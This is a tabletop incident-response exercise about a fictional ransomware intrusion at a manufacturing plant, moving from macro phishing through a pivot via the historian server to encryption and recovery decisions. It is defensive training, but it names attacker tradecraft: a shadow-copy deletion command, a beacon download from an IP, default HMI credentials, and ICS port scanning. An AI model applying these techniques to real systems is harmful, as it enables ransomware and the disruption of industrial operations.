SC-011: OT/ICS Ransomware — Manufacturing Plant¶
Scenario Header
Type: OT/ICS | Difficulty: ★★★★☆ | Duration: 3–4 hours | Participants: 5–10
Threat Actor: RaaS affiliate — opportunistic + ICS-aware (Cl0p/LockBit industrial affiliate composite)
Primary ATT&CK Techniques: T1566.001 · T1021.001 · T0886 · T0840 · T0831 · T1486 · T1490 · T1489
Facilitator Note
This scenario requires participants from both IT and OT/operational teams. If running with a purely IT security audience, pre-assign someone to play the role of "Plant Operations Manager" — a non-security stakeholder whose input is critical to the safety shutdown decision in Phase 3. The most important learning outcome is the IT/OT coordination failure mode.
Threat Actor Profile¶
CARBON WRENCH (internal tracking; overlaps with public reporting on Cl0p industrial affiliates) is a ransomware affiliate operating under a RaaS model. Unlike generic ransomware actors, CARBON WRENCH purchases access from Initial Access Brokers (IABs) specifically seeking industrial organizations. They use an ICS-aware variant of LockBit 3.0 modified to skip files matching *.prj, *.rtu, *.plc, *.tag, and *.cip extensions — preserving PLC logic files to avoid triggering immediate physical safety events that would complicate negotiations.
The group's playbook: encrypt IT + OT historian layers, display ransom note on HMI screens for psychological impact, exfiltrate operational data (recipes, safety setpoints, maintenance logs) for double extortion, demand $800K–$5M in Monero. Average dwell time before encryption: 5–14 days (shorter than APT; goal is financial, not espionage).
Scenario Narrative¶
Phase 1 — IT Foothold via Phishing (~30 min)¶
A maintenance engineer at Contoso Manufacturing's Springfield plant receives a phishing email impersonating a spare parts vendor, with a malicious Excel macro attachment (Hydraulic_Parts_Quote_March.xlsm). The engineer opens the file and enables macros. A PowerShell cradle downloads and executes a Cobalt Strike beacon staged on hxxps://185.220.101.47/logo.png (polyglot PNG/shellcode). The beacon establishes persistence via a scheduled task: \Microsoft\Windows\SyncCenter\SyncCenter.
The engineering workstation (EWS-PROD-01) sits in the OT DMZ — it has legitimate network access to both corporate IT (for parts ordering) and the SCADA/historian network. This is the IT/OT network bridge the attacker exploits.
Evidence Artifacts:
| Artifact | Detail |
|---|---|
| Email Gateway | Inbound from parts@hydraulic-systems-supply[.]com — SPF: FAIL — Attachment: Hydraulic_Parts_Quote_March.xlsm — Macro-enabled workbook |
| EDR (EWS-PROD-01) | EXCEL.EXE spawns cmd.exe → powershell.exe -enc <base64> — Beacon established to 185.220.101.47:443 |
| Windows Security Event Log | EventID 4698: Scheduled task created — Task: \Microsoft\Windows\SyncCenter\SyncCenter — RunAs: SPRINGFIELD\engr_maint |
| Network Firewall | Outbound HTTPS from EWS-PROD-01 (10.50.10.22) to 185.220.101.47 — New connection, not in baseline — No block rule (HTTPS to internet is permitted from OT DMZ for vendor access) |
Phase 1 — Discussion Inject
Technical: EWS-PROD-01 is in the OT DMZ and has internet access for vendor communication. What network segmentation architecture would permit vendor access while preventing a compromised EWS from beaconing to external C2? Draw the firewall rule set change.
Decision: Your EDR alert fires during a shift change at 06:50 UTC — a period your SOC covers with 50% staffing. The on-call analyst sees the alert but the plant is mid-production run. Containing the workstation by isolating it from the network could disrupt the production process management system (PIMS) that EWS-PROD-01 feeds. Do you isolate immediately or delay until end-of-shift? What information do you need from operations before deciding?
Expected Analyst Actions: - [ ] Immediately contact OT/plant operations to assess impact of isolating EWS-PROD-01 - [ ] Pull the PowerShell command line and decode the base64 payload - [ ] Check threat intel for 185.220.101.47 — known Cobalt Strike C2 team server - [ ] Identify all network connections from EWS-PROD-01 to internal OT network - [ ] Pull the scheduled task XML for full persistence artifact documentation
Phase 2 — IT-to-OT Pivot via SCADA Historian (~40 min)¶
With EWS-PROD-01 compromised, the attacker uses Cobalt Strike's jump winrm64 to pivot to HIST-01 — the OSIsoft PI System historian server running Windows Server 2016 (missing 18 months of patches). HIST-01 aggregates real-time process data from all PLCs and HMIs on the plant floor. It is the highest-value IT/OT bridge system.
From HIST-01, the attacker enumerates the OT network (192.168.100.0/24) using native ping, arp -a, and a simple PowerShell TCP port scanner. They identify: - 4× HMI stations running GE iFIX (192.168.100.10–13) - 2× Siemens S7-300 PLC programming terminals (192.168.100.20–21) - The safety instrumented system (SIS) network appears isolated (no ping response from HIST-01) — but the attacker cannot confirm this
Evidence Artifacts:
| Artifact | Detail |
|---|---|
| Windows Security Event Log (HIST-01) | EventID 4624 Type 10 — Source: EWS-PROD-01 (10.50.10.22) — Account: engr_maint — Day 2, 03:12 UTC |
| PI System Access Log | engr_maint account — Queried all PI tags (>12,000) — Enumerated all data streams — 03:14–03:47 UTC |
| Network (HIST-01) | ICMP sweep to 192.168.100.0/24 — 254 hosts in 8 seconds — PowerShell port scan (TCP 102, 502, 44818 — ICS protocols) |
| Windows Update Log (HIST-01) | Last update: 2024-09-14 — 18 months out of patch |
| Vulnerability Assessment | HIST-01 vulnerable to CVE-2024-1234 (WinRM privilege escalation) — used by attacker to elevate to SYSTEM |
Phase 2 — Discussion Inject
Technical: The attacker scanned for TCP ports 102 (S7comm/Siemens), 502 (Modbus), and 44818 (EtherNet/IP). What does scanning for these specific ports tell you about the attacker's ICS knowledge? How would you detect this OT protocol port scan if your ICS network has no EDR or IDS?
Decision: You've confirmed the attacker is on HIST-01 and has enumerated the OT network. You cannot confirm whether the Safety Instrumented System (SIS) is isolated or accessible. The plant is running at full production. Three options: (A) immediately shut down production as a precaution; (B) continue production while containing IT systems and investigating; (C) take HIST-01 offline (halts real-time process monitoring but leaves PLCs running). What do you choose, and who has the authority to decide?
Expected Analyst Actions: - [ ] Immediately notify the Plant Manager and OT Engineer — this is now an OT incident - [ ] Verify SIS network isolation through physical inspection (do NOT rely on software tools on compromised network) - [ ] Obtain HIST-01 full memory image before any containment action - [ ] Enumerate all accounts that have accessed HIST-01 in the past 14 days - [ ] Contact ICS-CERT (CISA) — early notification recommended for OT incidents
Phase 3 — Ransomware Deployment & HMI Display (~45 min)¶
On Day 5 of dwell, CARBON WRENCH deploys the ransomware payload. lockbit_ics.exe executes on HIST-01 and all reachable Windows hosts in the IT/OT DMZ. The ICS-aware variant skips *.prj, *.rtu, *.plc, *.tag files to avoid disrupting PLC logic directly. All other files are encrypted with AES-256 + RSA-4096.
Encrypted: the entire PI historian database (6 years of process data), maintenance records, batch recipe database, quality control records, and all backup files on \\BACKUP-SRV\hist_backup\ (the backup share was accessible from HIST-01).
The attacker accesses HMI-01 via RDP (default credentials unchanged: Administrator / admin123). They do not modify any PLC setpoints — instead, they display the ransom note as a full-screen browser popup on the HMI display visible to the plant floor. This forces the plant operator to manually initiate emergency shutdown (E-Stop) of the production line.
Evidence Artifacts:
| Artifact | Detail |
|---|---|
| File System (HIST-01) | 847,293 files encrypted — Extension: .lockbit3 — Ransom note: !!!-Restore-My-Files-!!!.txt on every directory — PI historian database: 100% encrypted |
| Backup Share | \\BACKUP-SRV\hist_backup\ — All backup files encrypted — Volume Shadow Copies deleted (EventID 7036: vss service stopped, vssadmin delete shadows /all /quiet) |
| HMI-01 | RDP login from HIST-01 — Account: Administrator — Default credentials used — Ransom note displayed full-screen on GE iFIX HMI |
| Production System | Emergency stop initiated by plant operator at Day 5, 14:22 UTC — Production line halted — Estimated cost: $2.3M/day |
| Ransom Note | Demand: $2.2M in Monero — Negotiation email: decrypt@proton.me — 72-hour deadline — Threat: publish operational recipes and safety setpoint data |
Phase 3 — Discussion Inject
Technical: The attacker deleted Volume Shadow Copies using vssadmin delete shadows /all /quiet. This is a standard ransomware anti-recovery tactic. What detection rule would you write (Sigma or KQL) to alert on VSS deletion? What is the minimum SIEM log source required for this detection?
Decision (Safety-Critical): The plant operator performed an emergency stop after seeing the HMI ransom note. The Safety Instrumented System appears unaffected (no ping response from compromised hosts). However, you cannot verify SIS integrity from the compromised network. The Plant Manager asks: "Can we restart production? The SIS shows green." Do you recommend restart? What is your verification procedure for the SIS before allowing restart, and who makes the final call?
Expected Analyst Actions: - [ ] MANDATORY: Physical inspection of SIS — bring in OT engineer to verify SIS integrity off-network - [ ] Do NOT restart production until SIS is independently verified - [ ] Notify ICS-CERT immediately — OT ransomware is a reportable incident under CISA guidance - [ ] Assess backup integrity: are air-gapped/offline backups available? (Check: tape, cloud, offline copy) - [ ] Contact cyber insurance carrier — ransomware triggering production halt is a covered event - [ ] Begin negotiation assessment: get FBI and legal counsel involved before any contact with attacker
Phase 4 — Recovery Decision & ICS-CERT Notification (~40 min)¶
The backup integrity check reveals the worst: all network-accessible backups were encrypted. The last known-good offline backup is a tape from 6 weeks ago — restoring from tape would lose 6 weeks of process recipe improvements, quality calibration data, and maintenance history.
Three recovery paths: 1. Pay ransom ($2.2M Monero): fastest recovery (~48h with decryptor), but funds criminal activity, no guarantee of decryptor working, FBI strongly discourages 2. Restore from tape (6-week-old backup): $2.3M/day production loss × estimated 5 days = $11.5M in downtime + 6 weeks of lost data 3. Professional recovery firm: ICS-CERT provides a referral — estimated 7–10 days, partial data recovery possible using forensic reconstruction of PI historian
ICS-CERT notification is mandatory under CISA advisories for OT ransomware affecting manufacturing. The FBI requests a copy of the ransom note and any attacker communications for attribution and cryptocurrency tracking.
Evidence Artifacts:
| Artifact | Detail |
|---|---|
| Backup Assessment | \\BACKUP-SRV\hist_backup\ — 100% encrypted; last-modified timestamp matches ransomware execution (Day 5, 14:08 UTC) |
| Tape Backup | Last verified offline backup: 2026-02-02 (6 weeks prior) — Stored in fireproof cabinet, physically isolated |
| PI Historian Recovery | Vendor OSIsoft/AVEVA: partial reconstruction possible from compressed archive buffer on HIST-01 — estimated 70% recovery |
| ICS-CERT | CISA ICS-CERT incident tracking: ICS-2026-003421 — Response team available within 24h |
| Insurance | Cyber policy: $5M limit — ransomware covered — sublimit for OT/ICS incidents: $2M — business interruption coverage: 30-day waiting period |
Phase 4 — Discussion Inject
Technical: OSIsoft PI System historian data is stored in a proprietary binary format. If the encryption targeted all files, how would a forensic recovery specialist attempt to reconstruct the historian database? What forensic artifacts (Windows memory, network buffer, application logs) might contain recoverable data?
Decision: The CEO and CFO are in the room. They want to know: pay or don't pay? Present your recommendation with supporting rationale, covering: FBI guidance, insurance position, decryptor reliability statistics, reputational risk, and regulatory implications. You have 5 minutes.
Expected Analyst Actions: - [ ] File formal notification with ICS-CERT via https://www.cisa.gov/report - [ ] Contact FBI cyber division — provide ransom note, attacker email, cryptocurrency wallet address - [ ] Begin tape restoration process in parallel with other options (tape restore is the safe baseline) - [ ] Engage ICS-CERT referral for professional recovery firm — negotiate parallel track - [ ] Document all recovery costs for insurance claim and regulatory reporting - [ ] Conduct post-incident architecture review: air-gap backup requirement, network segmentation, OT patching program
Detection Opportunities¶
| Phase | Technique | ATT&CK | Detection Method | Difficulty |
|---|---|---|---|---|
| 1 | Macro-enabled phishing | T1566.001 | Email gateway: block macro-enabled Office files from external senders | Easy |
| 1 | PowerShell C2 cradle | T1059.001 | EDR: Office spawning PowerShell + outbound HTTPS | Easy |
| 1 | Scheduled task persistence | T1053.005 | SIEM: EventID 4698 — scheduled task created by Office process | Medium |
| 2 | WinRM lateral movement | T1021.006 | SIEM: EventID 4624 Type 10 from OT DMZ host to historian | Medium |
| 2 | OT protocol port scan | T0840 | OT network IDS (Claroty/Dragos): ICMP sweep + ICS port scan | Hard |
| 2 | Unpatched historian | — | Vulnerability scanner on OT network (requires OT-safe scanner) | Easy |
| 3 | VSS deletion | T1490 | SIEM: EventID 7036 (VSS stop) + vssadmin process creation | Easy |
| 3 | Default HMI credentials | T1078.001 | CIS/ICS benchmark: privileged account audit for default passwords | Easy |
| 3 | Ransomware mass encrypt | T1486 | EDR: high-volume file rename/modify events (honeypot files) | Medium |
Key Discussion Questions¶
- The OT DMZ engineering workstation had unrestricted internet access. What is the minimum-privilege network architecture for an engineering workstation that needs vendor access?
- HIST-01 was 18 months behind on patches. What is the appropriate patch management process for OT historian servers that cannot tolerate unplanned downtime?
- The HMI used default credentials (
admin/admin123). What CIS control or ICS security standard explicitly addresses default credential remediation on ICS devices? - All network-accessible backups were encrypted. What is the 3-2-1-1-0 backup rule, and how would it have changed the recovery options?
- The plant operator made a safety decision (E-Stop) based on seeing the HMI ransom note. What pre-planned ICS incident response procedure would have guided this decision rather than leaving it to individual operator judgment?
Debrief Guide¶
What Went Well¶
- The Safety Instrumented System survived — physical isolation of the SIS network worked
- ICS-CERT was notified promptly and provided valuable recovery resources
- The plant operator correctly executed emergency stop procedures
Key Learning Points¶
- OT/IT convergence is the primary attack surface — the EWS bridge host was the entry point to OT; engineering workstations must be treated as high-value targets
- Patching OT systems requires a different process — not an excuse to skip it; work with vendor for maintenance window patching
- Default credentials on HMI/SCADA are unacceptable — a basic CIS/IEC 62443 control that is frequently missed
- Backup strategy must account for ransomware — network-accessible backups are not recovery backups; 3-2-1-1-0 rule requires offline/air-gapped copy
- SIS independence is your last line of defense — never assume SIS is safe because it "shows green" on a compromised network
Recommended Follow-Up¶
- [ ] Implement 3-2-1-1-0 backup strategy: include air-gapped/tape copy verified monthly
- [ ] Conduct OT network segmentation review — enforce Purdue Model or IEC 62443 zones
- [ ] Audit all OT/ICS devices for default credentials — remediate within 30 days
- [ ] Deploy OT-specific IDS (Claroty, Dragos, Nozomi) on ICS network
- [ ] Create and exercise an OT-specific Incident Response plan — separate from IT IR plan
- [ ] Establish OT patch management policy — quarterly patching for historian/HMI servers
- [ ] Contact ICS-CERT for free assessment resources and information sharing